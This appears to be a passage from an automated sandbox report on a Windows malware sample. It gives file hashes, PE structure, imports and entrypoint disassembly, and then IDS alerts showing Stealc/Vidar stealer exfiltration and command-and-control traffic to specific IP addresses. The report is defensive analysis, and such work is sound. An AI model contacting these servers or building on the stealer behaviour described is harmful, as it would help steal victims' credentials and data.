                                                                                                                                                                                                                                                                    SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                                                                                                                                                                    SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTu2DxB2kN0cQ82G6LVzDDDtDSuJSg"
                                                                                                                                                                                                                                                                    Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 68

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):131974
                                                                                                                                                                                                                                                                    Entropy (8bit):5.437088444529707
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:M+Dkn6pZfaevUAIzym1WI+BXWb3tT36z6x0zV:j06jL8Lzym1WI+BX49T346AV
                                                                                                                                                                                                                                                                    MD5:58D956E3154620BD8032FCB0B0E54F37
                                                                                                                                                                                                                                                                    SHA1:A36D1E722C8B5F2B028D284619C88C1E077BD9DA
                                                                                                                                                                                                                                                                    SHA-256:24BD82E3A9803B13C78F22CDC80CA768C79AE17C8A871D3AA7D092BD2369E1DF
                                                                                                                                                                                                                                                                    SHA-512:2C09CD7A3D38DFCB7E2105225E3CCDE99FA0110670C4B803CD66A95051148F3022DE3DC7885F370E25E2FA8F72FA242F71803A4014385499F1A46C090A3F97A3
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 69

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):117446
                                                                                                                                                                                                                                                                    Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                    MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                    SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                    SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                    SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 70

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):171795
                                                                                                                                                                                                                                                                    Entropy (8bit):5.5579117150428825
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:fEP/ArfiIV/fxZXVg+Jt0VPEif4IPBuaIhUtOUZCXtXg92CMWpV/Q/jsVS7ni18y:fEPYuIV/fXXVgMt0VPEiwIPBuaIhUwU3
                                                                                                                                                                                                                                                                    MD5:AD42D2897C24673C142FE27E2420797B
                                                                                                                                                                                                                                                                    SHA1:8C2D5DA568A2C80024AF368A92F78363A6AD0F2F
                                                                                                                                                                                                                                                                    SHA-256:5B779306CC4713B5A999A14FF302B7B9BC2FEC837BCE4CC7EF146B1A3DDC4928
                                                                                                                                                                                                                                                                    SHA-512:3ECFCF36BC095B04AA612383003909FDD64819664F0DD00D1954432A445749B8ED8960E1C14CA5CD3310D8381B1ABFCC9140E429B93123DD9448FBF4E57A0110
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTs9um7nM7ISNupfodds9-y7C7I4sA"
                                                                                                                                                                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ri=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Si=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Ti,Wi,Xi,Zi,$i,cj;Ti=function(){return typeof BigInt==="function"};Wi=function(a){const b=a>>>0;_.Ui=b;_.Vi=(a-b)/4294967296>>>0};Xi=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Yi=function(a){if(a<0){Wi(-a);const [b,c]=Xi(_.Ui,_.Vi);_.Ui=b>>>0;_.Vi=c>>>0}else Wi(a)};Zi=function(a){a=String(a);return"0000000".slice(a.length)+a};.$i=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Ti()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Zi(c)+Zi(a));return c};_.aj=function(a,b){if(b&2147483648)if(Ti())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Xi(a,b);a="-"+$i(c,d)}else a=$i(a,b);return a};._.bj

                                                                                                                                                                                                                                                                    Chrome Cache Entry: 71

                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                    Entropy (8bit):6.324836330985117
                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                                                                                                                                    • InstallShield setup (43055/19) 0.43%
                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                    File name:SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe
                                                                                                                                                                                                                                                                    File size:6'504'448 bytes
                                                                                                                                                                                                                                                                    MD5:b8930ce311970e82b7b52dbfa4d81187
                                                                                                                                                                                                                                                                    SHA1:7aaf10c720b8cfd1b9daa0174de934a9fa31f410
                                                                                                                                                                                                                                                                    SHA256:4f6f1b2e6fc03473bf5d66cca5013f5ed5a96df2ac46b38e525ee733d230cf88
                                                                                                                                                                                                                                                                    SHA512:5f75bcf4d1746ce1809f94a306d085525b07998929ce4e8b3cfdc40d7338b9e137f1b85819658125966ee3b4357a82dd4236ea7dc581805d06b86b5a3300b37f
                                                                                                                                                                                                                                                                    SSDEEP:49152:+U4K1Qy8nPDdZiBSFfscuj9ADJZlShhV7+pXLRB5TYAUhJSh7DUtiGlMlHDNuc6P:+NbrnrShj9AVYhgB5IJsnUw918Svlj
                                                                                                                                                                                                                                                                    TLSH:E6663990FADB54B5EA03187044A7627F23346E098B26CFD7EA507F59EC376E10E32199
                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>c..................P.......W........[...@..........................pf...........@................................

                                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Entrypoint:0x465790
                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                                                    Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                    jmp 00007F17D50D22F0h
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                                                                    mov dword ptr [esp+14h], esi
                                                                                                                                                                                                                                                                    mov dword ptr [esp+18h], edi
                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                    mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                    cmp edx, 00000000h
                                                                                                                                                                                                                                                                    jne 00007F17D50D4629h
                                                                                                                                                                                                                                                                    mov eax, 00000000h
                                                                                                                                                                                                                                                                    jmp 00007F17D50D4686h
                                                                                                                                                                                                                                                                    mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                                                                                    cmp edx, 00000000h
                                                                                                                                                                                                                                                                    jne 00007F17D50D4627h
                                                                                                                                                                                                                                                                    call 00007F17D50D4719h
                                                                                                                                                                                                                                                                    mov dword ptr [esp+20h], edx
                                                                                                                                                                                                                                                                    mov dword ptr [esp+24h], esp
                                                                                                                                                                                                                                                                    mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                                                                                                                                    cmp edx, ebx
                                                                                                                                                                                                                                                                    je 00007F17D50D463Ah
                                                                                                                                                                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                    mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                                                                                    mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                                                                                    sub edi, 28h
                                                                                                                                                                                                                                                                    mov dword ptr [edi+24h], esp
                                                                                                                                                                                                                                                                    mov esp, edi
                                                                                                                                                                                                                                                                    mov ebx, dword ptr [ecx]
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                                                                                                    mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                                                                                    mov dword ptr [esp+08h], edx
                                                                                                                                                                                                                                                                    call esi
                                                                                                                                                                                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                    mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                                                                                    mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                    mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                                                                                    mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                                                                                    mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                    mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                    mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                                    retn 0004h
                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                    mov edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                    mov eax, esp

                                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x63d0000x3dc.idata
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x63e0000x27232.reloc
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x5b9ac00xa0.data
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                    .text0x10000x2ee9150x2eea00483a6ed84d8d021d45531e12fff998edunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .rdata0x2f00000x2c86500x2c880053849e681cf54d588fc8da6d1f798b77unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .data0x5b90000x835680x55000ceafd12f35649fae6e61da7475ac006eFalse0.3814395680147059data5.543729162749801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                    .idata0x63d0000x3dc0x400d11b3d3586a977db475261b0c5248d7eFalse0.4892578125data4.623343956420241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                    .reloc0x63e0000x272320x27400edc661fce8d0b8e4eaf9e62a08309fbdFalse0.5779694964171974data6.653430177352452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .symtab0x6660000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                    kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                    2025-02-15T23:26:52.450158+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973777.239.117.222443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:26:56.053025+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44991088.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:26:57.354777+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44992088.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:26:58.945593+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config188.99.124.230443192.168.2.449931TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:00.259341+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1188.99.124.230443192.168.2.449941TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:02.638577+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44995288.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:03.483075+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44995888.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:11.023301+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45001688.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:11.334322+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45002888.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:11.334322+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45002888.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:12.336013+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45003588.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:12.336013+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45003588.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:13.513684+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45003788.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:13.513684+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45003788.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:15.365996+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45003888.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:15.577797+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45003988.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:15.577797+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45003988.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:16.646538+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45004088.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:16.646538+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45004088.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:17.633352+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.45004188.99.124.230443TCP
                                                                                                                                                                                                                                                                    2025-02-15T23:27:17.633352+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.45004188.99.124.230443TCP
